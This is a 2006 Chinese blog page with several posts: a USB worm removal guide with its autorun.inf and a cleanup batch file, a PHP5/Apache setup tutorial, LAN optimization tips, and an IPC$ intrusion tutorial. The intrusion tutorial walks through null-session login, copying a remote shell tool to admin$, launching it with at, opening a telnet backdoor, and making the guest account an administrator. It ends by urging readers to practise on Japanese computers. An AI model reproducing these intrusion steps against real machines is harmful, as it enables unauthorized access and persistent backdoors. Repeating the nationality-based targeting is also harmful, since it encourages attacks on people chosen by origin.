2006年08月23日

开机自动打开记事本 worm 蠕虫 

经常碰见一些人的电脑打开时,会自动运行记事本,很适郁闷,上网找了个清理方法放上来,以后备用。

[蠕虫简单分析]:

蠕虫名称:Worm.Win32.Delf.aj(AVP)
蠕虫别名:Trojan.Spy.UsbSpy.a(瑞星)、TrojanSpy.USBSpy.a(江民)
蠕虫大小:47,104字节
加壳方式:UPX
MD5:07adddef653a702b9a11edbcee07e82b
CRC32:100A382A

[发作现象]:

电脑开机时会自动弹出记事本,会生成wincfgs.exe、KB20060111.exe等文件

[行为分析]:

1. 在注册表中创建USBSpyRunMutex互斥量,避免重复感染。
2. 在系统中生成
C:\%system%\wincfgs.exe(系统、隐藏、只读属性)
C:\%WINDOWS%\KB20060111.exe(大小66,560 字节,非病毒,是记事本程序)
3. 在注册表中添加:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Load="C:\windows\system32\wincfgs.exe"
4. 在移动设备中生成RECYCLER\RECYCLER目录和autorun.inf,在这个目录下生成autorun.exe、desktop.ini。

autorun.inf的内容:

[autorun]
open=.\RECYCLER\RECYCLER\autorun.exe

shell\1=Open
shell\1\Command=.\RECYCLER\RECYCLER\autorun.exe
shell\2\=Browser
shell\2\Command=.\RECYCLER\RECYCLER\autorun.exe

shellexecute=.\RECYCLER\RECYCLER\autorun.exe

autorun.exe同wincfgs.exe

desktop.ini的内容:

[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}

由此可见,当含有病毒的移动设备接入电脑时,蠕虫会被自动运行。
开机弹出的记事本便是这个KB20060111.exe文件了,诱发这个KB20060111.exe的启动可能不是常规启动项,而是wincfgs.exe这个文件启动(呼叫)KB20060111.exe文件的。就是说KB20060111.exe这个文件并非病毒或者Joke程序本身,其实KB20060111.exe就是一个记事本程序(这也就是为什么KB20060111.exe文件的图标也是一个记事本程序的图标的缘故)。另外没有清理wincfgs.exe的计算机再次接入一个干净的移动存储设备可能会再次传染这个移动存储设备。

[修改办法]
1、修改注册表
a.运行"regedit"启动注册表编辑器;
b.分别删除注册表项
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
下的Load注册表键里的键值内容。
不放心的话可以搜索"wincfgs.exe"的注册表键并删除之
2、删除文件
%SystemRoot%\system32\wincfgs.exe
%SystemRoot%\KB20060111.exe
3移动存储设备:
连接好USB后,打开我的电脑,点右键选择打开(不要直接点击打开或点"open"),然后打开菜单栏的"工具"->"文件夹选项"->"查看",去掉"隐藏受保护的系统文件(推荐)"前面的勾。删除掉优盘里面的desktop.ini,wincfgs.exe和autorun.inf
移动硬盘的手动删除每个盘符下面的desktop.ini,wincfgs.exe和autorun.inf文件。。

还有个方便的方法 批处理删除注册表修改:
复制下面文字到记事本,另存为"Wincfgs_kill.bat"(注意保存时选择文件类型为"所有文件")

echo off
tskill KB20060111
tskill wincfgs
del %windir%\kb20060111.exe
del %windir%\system32\wincfgs.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v "load" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v "load" /t REG_SZ /d "" /f

然后运行,完毕后重启电脑

2006年08月21日

   目前 PHP5 发布了第三个候选版本,估计正式版本不久就快释放了。安装过程应该不会有所变化,下面文章内容将讲述 Windows2000/XP/2003(不建议在 windows 98 下建立 PHP 环境) 下 PHP 环境的配置,服务器选择 Apache 2.0.49,数据库选择 MySQL 4.0.20 版本。

需要下载几个软件包:

  1. PHP5 RC3
  2. Apache 2.0.49
  3. MySQL 4.0.20

下载软件包
1. PHP5 RC3
PHP 的下载地址为: http://www.php.net/downloads.php ,找到如下图位置,下载方框中的两个软件包。其中 PHP 5.0.0RC3 zip package 就是 PHP5 软件包,而 Collection of PECL modules for PHP 5.0.0RC3 则是 PHP5 的 PECL 扩展模块集合包。 下载完成后放于 C 盘备用。

2. Apache 2.0.49
Apache官方下载地址为: http://httpd.apache.org/download.cgi ,找到如下图位置,下载 For Windows 的 MSI 安装包,保存于 C 盘备用。

3. MySQL 4.0.20
 MySQL 官方下载地址为: http://dev.mysql.com/downloads/mysql/4.0.html ,找到 Windows downloads 部分,下载 Without installer 包并保存于 C 盘,如下图所示:

安装 PHP5
  假设你的系统安装于 C 盘,否则下列目录均须改成相应的盘的目录。
  将下载来的 PHP5 RC3(php-5.0.0RC3-Win32.zip) 解压缩到 C:\PHP5\ 目录下。将 PECL 扩展模块集合包里的所有文件解压缩到 C:\PHP5\ext\ 目录下。
  复制 C:\PHP5\ 目录下的 php5ts.dll 文件到 C:\windows\(如果是 windows 2000 操作系统,则为 C:\WINNT\ 目录,下同,不再重复说明) 目录下。
  复制 C:\PHP5\ 目录下的下列 dll 文件于 C:\windows\system32\ 目录下:

fdftk.dll
fribidi.dll
gds32.dll
libeay32.dll
libintl-1.dll
libmhash.dll
libmysql.dll
libmysqli.dll
ntwdblib.dll
ntwdblib.dll
yaz.dll

其中 libmysql.dll 为 MySQL 4.1 之前版本的扩展支持,libmysqli.dll 为 MySQL 4.1 之后版本的扩展支持。因为我上面下载的是 MySQL 4.0.20 ,所以其实复制 libmysql.dll 即可。
  复制 C:\PHP5\ 目录下的 php.ini-dist 文件到 C:\windows\ 目录下,并改名为 php.ini ,并用记事本打开编辑:
  定位到下面两行:

; Directory in which the loadable extensions (modules) reside.
extension_dir = "./"

修改下面一行使它指向 C:\PHP5\ext\ 目录,修改后如下:

; Directory in which the loadable extensions (modules) reside.
extension_dir = "C:\PHP5\ext\"

定位到下面两行:

;Windows Extensions
;Note that ODBC support is built in, so no dll is needed for it.

可以看到下面列出了所有可支持扩展,我们可以去掉前面的分号来使 PHP 支持相应的扩展。我测试了下,支持下列扩展,也可以根据选择是否配置。

extension=php_bz2.dll
extension=php_cpdf.dll
extension=php_curl.dll
extension=php_dba.dll
;extension=php_dbase.dll
extension=php_dbx.dll
;extension=php_exif.dll
extension=php_fdf.dll
extension=php_filepro.dll
extension=php_gd2.dll
extension=php_gettext.dll
;extension=php_iconv.dll
;extension=php_ifx.dll
extension=php_iisfunc.dll
extension=php_imap.dll
;extension=php_interbase.dll
extension=php_ldap.dll
extension=php_mbstring.dll
;extension=php_mcrypt.dll
extension=php_mhash.dll
extension=php_mime_magic.dll
extension=php_ming.dll
;extension=php_mssql.dll
;extension=php_msql.dll
extension=php_mysql.dll
;extension=php_oci8.dll
extension=php_openssl.dll
;extension=php_oracle.dll
extension=php_pdf.dll
;extension=php_pgsql.dll
extension=php_shmop.dll
extension=php_snmp.dll
extension=php_sockets.dll
;extension=php_sybase_ct.dll
extension=php_tidy.dll
;extension=php_w32api.dll
extension=php_xmlrpc.dll
extension=php_xsl.dll
;extension=php_yaz.dll
extension=php_zip.dll

保存文件并退出。

安装 Apache 2.0.49
 准备好下载下来的apache_2.x.x-win32-x86-no_ssl.msi 。双击后开始安装。一步 Next 下来,同意许可协议后会有填写服务器信息的页面,本地调试,前面两个输入 localhost 即可。如下:

一路 Next 下来,均按照默认路径安装――当然你也可以选择你自己需要的路径。Apache 会自动安装并启动相关服务。并在任务栏右下角运行着一个 Apache 监控器:

我们可以从这个监控器来重起、停止、启动 Apache 服务。双击小图标打开控制界面:

接下来对 Apache 的配置文件进行配置,用记事本打开 C:\Program Files\Apache Group\Apache2\conf\ (我这里是按照默认安装路径安装,后面的设置按照自己的安装路径做相应的改变) 目录下的 httpd.conf 文件,定位到下面这行:

DirectoryIndex index.html index.html.var

在其后面添加一个 PHP 默认页,通常是 index.php ,如下:

DirectoryIndex index.html index.html.var index.php

为了使 Apache 识别 PHP 的相关扩展名,搜索并定位到下面这个部分:

<Directory "C:/Program Files/Apache Group/Apache2/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>

在后面添加如下两行:

AddType application/x-httpd-php .php .phtml .php3 .php4
AddType application/x-httpd-php-source .phps

指定 php 模块,找到并定位到如下这行:

#LoadModule ssl_module modules/mod_ssl.so

在下面添加一行:

LoadModule php4_module c:\php5\php5apache2.dll

使它指向 PHP5 目录下的 php5apache2.dll 文件,路径一定要准确。
  为了指定 Apache 识别中文,我们指定 GB2312 为默认编码。应该找到并定位到下面这行

AddDefaultCharset ISO-8859-1

将其修改为:

AddDefaultCharset GB2312

另外,如果要禁止目录浏览,查找并定位到下面这几行:

<Directory "C:/Program Files/Apache Group/Apache2/htdocs">
#……
#一些注释
#……
Options Indexes FollowSymLinks

去掉几行注释下面进跟着的一行的 Indexes 即可,修改后:

<Directory "C:/Program Files/Apache Group/Apache2/htdocs">
#……
#一些注释
#……
Options FollowSymLinks

OK,保存 httpd.conf 文件后重起 Apache 服务器。

安装MySQL 4.0.20

将 mysql-4.0.20-win-noinstall.zip 文件夹压缩到 C 盘根目录下(注意:使用该版本 MySQL 必须将解压缩后文件夹放于 C 盘根目录下),解压缩后可以在 C 盘根目录下找到名为 mysql-x.x.x 的文件夹。将其改名为 mysql 。
  进入 bin 目录,找到 winmysqladmin.exe 文件,打开它。第一次运行会提示输入一个新的用户名和密码。这里可以随意选择你需要的用户名和密码输入,作为 my.ini 的默认用户名和密码。如下图:

点击 OK 确定后,WinMySQLadmin 将缩小到右下角的任务栏里:

我们来看看 MySQL 服务是否启动。打开“控制面板”,进入后打开“管理工具”,再打开“服务”。如果一切顺利的话我们会看到 MySQL 已启动的信息,如下图:

到这里 MySQL 的安装告一段落,非常简单。
测试 PHP 是否配置成功:
  打开记事本,输入如下这行代码:

<?php phpinfo(); ?>

保存为 phpinfo.php 文件,存放于 Apache2\htdocs\ 目录下,记得保存的时候选择保存类型为“所有文件”,如下图:

好了,打开浏览器,在地址栏中输入: http://localhost/phpinfo.php 并回车,如果一切顺利的话你将看到下面这个页面,到此 PHP5 的配置大功告成:

注:本文未从安全性和性能上来讨论服务器的配置,相应的安全配置请参考其他手册,本文仅简单介绍了 PHP5 环境的配置,作为学习 PHP5 的前提,本文并不能作为服务器配置文章来阅读,比如,这里没有设置 MySQL 的 root 用户密码,将导致很大的安全隐患,所以请读者自行设置。

一 唠叨一下:
网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
  

五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六  如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七  如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net

八 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:""        (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码"     (同样有3个空格)

3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名"       (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接
net use \\IP\ipc$ /del

5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
  
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
  
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
  
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
  
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组    
10. C:\>net user guest /active:yes
将对方的Guest用户激活

11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)

十 总结:
关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

2006年08月15日

虽然目前的网卡、HUB和交换机都能提供100M甚至更宽的带宽,但一个局域网如果配置不当,尽管配置的设备都非常高档而网络速度仍不能如意;或者经常出现死机、打不开一个小文件或根本无法连通服务器,特别是在一些设备档次参差不齐的网络中这些现象更是时有发生。在局域网中恰当地进行配置,才能使网络性能尽可能地进行优化,最大限度地发挥网络设备、系统的性能。其实局域网也是由一些设备和系统软件通过一种连接方式组成的,所以局域网的优化包括以下几个方面:

  设备优化。包括传输介质的优化、服务器的优化、HUB与交换机的优化等。

  软件系统的优化。包括服务器软件的优化和工作站系统的优化。

  布局的优化。包括布线和网络流量的控制。

  设备优化篇

  网线为什么会影响局域网的优化?

  网线看似非常普通,价格也非常低廉,但它对整个网络性能起着非常重要的作用,网线选择不好、接口制作不恰当都会影响到网络性能的优化。

  在配置网络设备过程中,网线(仅以因特网中所使用的双绞线为例)通常是人们最易忽略的,常常有人认为“网线”没有什么可考虑的,只要是双绞线,或只要是5类双绞线即可,其实不然。为了降低信号的干扰,双绞线电缆中的每一线对都是由两根绝缘的铜导线相互扭绕而成,而且同一电缆中的不同线对扭绕圈数也不一样。在绕线方向上标准双绞线电缆中的线对是按逆时针方向进行扭绕。但有些非正规厂商生产的电缆线为了简化制造工艺,电缆中所有线对的扭绕密度相同,线对中两根绝缘导线的扭绕密度不符合技术要求,还有线对的扭绕方向不符合要求。这些不良现象将会引起双绞线的近端串扰(指UTP中两线对之间的信号干扰程度),从而使传输距离达不到要求。双绞线的扭绕度在生产中都有较严格的标准,实际选购时,在有条件的情况下可用一些专业设备进行测量,但一般用户只能凭肉眼来观察。需要说明的是,5类UTP中线对的扭绕度要比3类密,超5类要比5类密,这个密度一般用肉眼很难看出来。

  如何选择网线?

  在为局域网选购线材时一般来说是选购5类或超5类网线,因为3、4类双绞线一般是使用在10M/bps的因特网中,而5类双绞线能满足现在日趋流行的100M/bps的因特网,超5类双绞线主要用于将来的千兆网上,但现在也普通应用于局域网中,因为价格方面比5类线贵不了多少,现在已有6类线了,一般用于ATM网络中,公司局域网中暂时还不推荐采用。

  有些不良厂商经常会用3类、4类线的线材来冒充5类甚至超5类线,因此要注意选择择名牌产品,如AMP、LUCENT(原AT&T)、IBDN(加拿大北方电信)等。

  这些线类如属正规厂家生产则都在包装的封皮上有标识,如3类线就用“3 cable”,5类线就用“5 cable”,而超5类线则一般表示为“5e(或5E)cable”,要注意看清楚。另外好的双绞线较粗且较软,所印字符很清晰;冒牌产品为了节约成本,通常较细且一般较硬,在包裹塑料皮上所印字符也较粗糙。
  网线有哪些制作技巧?

  在网线的制作方面,存在着许多技巧,对局域网性能优化起着相当重要的基础作用。一般来说双绞线的制作方法有如下几种,要注意一一对应,不能错用。

  一一对应接法。即双绞线的两头连线要一一对应,一头的一脚,一定要连着另一头的一脚。这种网线一般是用
在交换机与计算机之间。

  1-3、2-6交叉接法。即网线一头的第一脚连另一头的第三脚,网线一头的第二脚连另一头的第六脚,其他脚一一对应。这种网线一般用在交换机的级连。

  100M接法。所谓100M接法,是指它能满足100M带宽的通信速率。它的接法虽然也是一一对应,但每一脚的颜色是固定的,具体是:第一脚——黄白、第二脚——黄色、第三脚——绿白、第四脚——蓝色、第五脚——蓝白、第六脚——绿色、第七脚——褐白、第八脚——褐色。

  目前一般最常用的方法就是一一对应法,但经实验(不同层楼间,较长的有60多米)发现,用这种接线法接的工作站会经常出现在打开服务器上的文件时死机,如果改用第3种接法网络质量有了较大的改观,很少出现以上的情况了。所以在继连网线时(就是从HUB或交换机到工作站之间的互联)最好采用第3种网线制作方法,这样可以最大限度地发挥5类或超5类网线的速度优势,使网络时刻保持畅通。

  选择水晶头应注意哪些事项?

  选择水晶头也是要选择较好的品牌,如AMP的,好的水晶头上的插针所采用的材料阻抗较小,不易氧化、生锈。同时,一些杂牌的水晶头插针与RJ-45插孔接触面比较小,容易造成接触不良。选择水晶头时,要注意水晶头的生产工艺,插针绝不能有氧化变色,并且接触面要大一点、光亮一点。另上水晶头的扣位弹性要好,否则很容易因扣不紧而引起接触不良。

  怎样从内存和硬盘方面优化服务器?

  服务器是局域网中最重要的组成部分,对服务器的优化能在很大程度上提升局域网的性能。

  在内存方面,服务器内存的选择不能与普通兼容机一样随便。服务器一般要求24小时连续不间断工作,而且要求主频速度较高,容量较大,一般要求在PC133以上。所以,在选择内存时一定要注意选择服务器专用内存,外频要在133MHZ以上,不能随便用一个PC机上的内存代替。内存的优化主要体现在内存访问缓冲时间的设置,在CMOS中有相应设置,一般应尽量设置为小一点的缓冲时间,这样速度会更快些。

  在硬盘方面,服务器硬盘是一个机电一体化的高精密产品,一般来说服务器上的硬盘在正常使用期间总是在不停地转动的(因为有许多用户在调用服务器中的数据或程序),所以要求服务器硬盘要求转速度要高,一般要求达到7200转/分钟。另外因为硬盘转速高,很容易产生高温,所以要求硬盘盘片材料散热性能要好。在接口方面,因为SCSI接口速度明显高于IDE接口的,所以一般要选择SCSI接口的,尽量减少因硬盘速率而影响整机性能。另外,服务器一般来说都要求有容错功能,所以硬盘要求允许热插拔。当然,服务器硬盘一般是专用的,不是随便在电脑市场买回一个同接口类型的就行了,价格也比同品牌、同容量的普通硬盘贵好几倍。

  服务器每天都进行着许多任务调度,所以使用一段时间后需要重新对硬盘进行扫描,以及时修复硬盘上的错误,并整理文件碎片。这可以安排在晚上让系统自动进行。这对于服务器性能的提高和保证相当重要。

  怎样从网卡和机箱方面优化服务器?

  服务器的网卡可以说是整个网络带宽的一个总出口,所以在选择网卡时一定要注意网卡的带宽,一般来说要选择100M/bps。如果是较简单的局域网,服务器网卡也至少要选择10M/100M自适应的,千万别选择10M的,这样不利于将来网络的扩展、升级。另外
,即使网卡带宽是100M,但不同厂家生产的实际带宽还是有很大不同,千万不要随便选择。购买时,要看一下网卡的板材质量和加工工艺,有的杂牌网卡采用最差的纸板来作为电路板,加工工艺非常粗糙。一般要求网卡电路板为铜双面或三层以上板,表面、焊点光泽发光。有名的网卡品牌如3COM、Intel,国内的主要有联想的D-LINK等。

  此外,如果网卡支持“全双工”传输,则应将在网卡属性中的“双工模式”设置成“全双工”模式。另外,如果所选网卡支持100M带宽,且与之相连的HUB或交换机是100M端口,则此时应把在网卡属性中的“媒体类型”一项设置成“100BaseTx”或“自动选择”模式。

  很少有人注意机箱的选择,但服务器因连续工作,很容易产生高温,所以散热就显得非常重要了,所以要求机箱的材质散热性能要好,空间要大,电源风扇排气能力要强。同时,因为服务器上所连设备较多,所以电源功率要大,至少要500W以上的名牌电源,如金长城、同创等。

  如何选择局域网的交换设备

  局域网的交换设备是集线器(HUB)或者交换机,在它们的选择方面主要注意端口的带宽,为了适应网络的扩充,HUB至少要选择10M/100M自适应的,条件好一点的当然可以考虑选择纯100M的。

  而交换机至少要选择10M/100M的。如果选择100M的,就要考虑用户的局域网所连工作站网卡是否全是100M的,如果不是,那就不要选择全100M端口的了,因为有些10M的网卡不支持100M的带宽。否则很可能花了高价钱买回来的100MHUB或交换机却令网络不能通畅。同样出于工艺和质量问题也要选择名牌,如3COM、Intel,国内的如联想的D-LINK、华为、中信、实达等,质量都比较好,性价比也相对要好些,售后服务也较有保障。

  如何优化局域网的交换设备?

  在HUB和交换机性能优化方面主要体现在HUB或交换机的级联上。如果需要HUB与HUB或HUB与交换机级联,则一定要注意HUB的带宽是所有端口共用的,因此每个端口实际利用的带宽则是应用总带宽(如100M)除以所用端口数。所以一般不用HUB来级联,而是通过用HUB连接在交换机的端口上,因为交换机所指的带宽就是每个端口的实际可用带宽,如n10M+m100M,就表明在这个交换机上有n个10M的带宽,有m个100M的带宽端口,这些带宽是具体端口独享的,而不受交换机所用端口数的限制。

  也就是说,如果一个HUB连在一个交换机的100M端口上,则这个HUB上就拥有总100M的带宽;如果一个HUB连接在有100M带宽的HUB端口上,则连接一个HUB可能使用了10个端口,实际上下一个HUB的总带宽就远达不到100M的带宽,这样就影响了连接在下一个HUB上的工作站速度。所以HUB级联一般最多为两层,多了速度会呈倍差级数减慢。

  另外还有两点要注意,其一是,当HUB要通过交换机级联时最好连接在100M带宽的端口,除非没有100M端口可用了;其二是,要注意双绞线最大单段网线长度在100米以内,否则信号会衰减严重,影响网络速度。

怎样正确地为服务器硬盘分区?

  在硬盘分工上要注意“按需而设”,如要在服务器上安装SQL数据库、进销存管理软件和一些财务软件,就最好分3个区,同时在C盘上大小要适当,一般选择10G左右(服务器总硬盘大小为40G),SQL和进销存软件安装在另外一个分区(不要安装在C盘分区,这样会
严重影响系统速度),大小应在20G左右,其他一些软件和财务软件放在其余盘,大小在10G左右。这样划分的原因是让C盘只安装系统软件,但有人认为不需要这么大,其实这不能与我们平时所用的PC机一样来看待,服务器上连着许多工作站,需要许多任务同时运行,系统会调用许多软件,这时会产生许多临时文件,需要大量磁盘空间来存放,况且服务器上每天都会产生一些日志文件(特别是一些诸如系统备份日志文件),每天这样下去也需要大量磁盘空间来保存(作为一个网管人员要定期对这些日志文件和临时文件进行清除),至于D盘一般较大是因为数据库每天会增加大量数据,所以要求磁盘空间应大些,至于E盘就不多说了。

  为什么要为服务器选择ntfs格式?

